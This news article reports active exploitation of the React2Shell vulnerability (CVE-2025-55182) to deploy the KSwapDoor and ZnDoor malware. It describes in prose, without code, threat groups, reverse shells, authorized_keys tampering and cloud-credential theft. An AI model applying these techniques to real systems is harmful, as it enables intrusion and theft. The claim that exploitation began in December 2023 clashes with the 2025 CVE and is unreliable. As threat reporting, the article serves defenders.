- The React2Shell security vulnerability is actively exploited to deploy advanced Malware such as KSwapDoor and ZnDoor.
- KSwapDoor is a stealthy Linux remote access tool using encrypted mesh networking and a “sleeper” mode to avoid firewalls.
- Multiple threat actor groups, including at least five China-linked ones, utilize React2Shell to deliver various payloads targeting cloud and enterprise systems.
- Attackers harvest cloud and AI credentials using tools like TruffleHog and Gitleaks to deepen access in compromised environments.
- Over 111,000 IPs remain vulnerable to React2Shell, with thousands of ongoing exploit attempts worldwide as tracked by security organizations.
A critical security flaw named React2Shell is being exploited by cybercriminals to deliver harmful malware such as the remote access tool KSwapDoor and backdoor ZnDoor. This exploitation has been ongoing since at least December 2023, with attacks targeting organizations globally, including those in Japan, where ZnDoor has been observed in the wild. The payload delivery often occurs via bash commands using wget to download and execute malicious code from remote servers.
KSwapDoor operates on Linux systems, creating an encrypted mesh network connecting compromised servers to evade detection and security blocks. Justin Moore, senior manager of threat intel research at Palo Alto Networks Unit 42, explained, “It uses military-grade encryption to hide its communications and features a ‘sleeper’ mode that lets attackers bypass firewalls by waking the malware up with a secret, invisible signal.” It also impersonates legitimate Linux kernel processes to avoid being flagged.
The React2Shell vulnerability is identified as CVE-2025-55182, carrying the maximum CVSS score of 10.0. Multiple threat actor groups with links to China have weaponized this exploit to deploy diverse payloads, including tunneling utilities (MINOCAT), downloaders (SNOWLIGHT), backdoors (COMPOOD and HISONIC), and remote access trojans such as ANGRYREBEL (also known as Noodle RAT).
Microsoft reported that attackers leverage the vulnerability to execute arbitrary commands, establish reverse shells to Cobalt Strike servers, deploy remote monitoring tools like MeshAgent, alter authorized_keys, and enable root login. The intruders also use Cloudflare Tunnel endpoints to obscure their activities. These attacks involve credential theft targeting cloud service metadata endpoints for platforms like Azure, AWS, Google Cloud Platform, and Tencent Cloud. Tools such as TruffleHog and Gitleaks assist in extracting sensitive secrets including AI service tokens (OpenAI API keys), Kubernetes service accounts, and various cloud-native credentials.
A campaign known as Operation PCPcat has compromised over 59,000 servers by exploiting React2Shell and other Next.js vulnerabilities, stealing configuration files, SSH keys, cloud credentials, and system data. The malware establishes persistence, deploys SOCKS5 proxies, and creates reverse shells for ongoing control and propagation, showing signs of extensive intelligence-driven data exfiltration.
Current tracking by the Shadowserver Foundation reveals more than 111,000 IP addresses vulnerable to React2Shell, with the highest numbers in the United States, Germany, France, and India. Security telemetry from GreyNoise identifies over 500 malicious IPs actively attempting exploitation in the past 24 hours across the U.S., India, the U.K., Singapore, and the Netherlands.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
Previous Articles:
- SEC’s Atkins Warns Crypto Risks, Advocates Privacy Tools Amid Dip
- Solana Endures Fourth-Largest DDoS Attack, Network Stays Stable
- Bitcoin Drops 30% as Sharks Accumulate, Whales Fuel Sell-Off Risk
- Ripple Set to Unlock 1B XRP Jan 2026, Traders Fear Dump
- Crypto Liquidations Top $584M as XRP Leads Losses, BTC Slumps
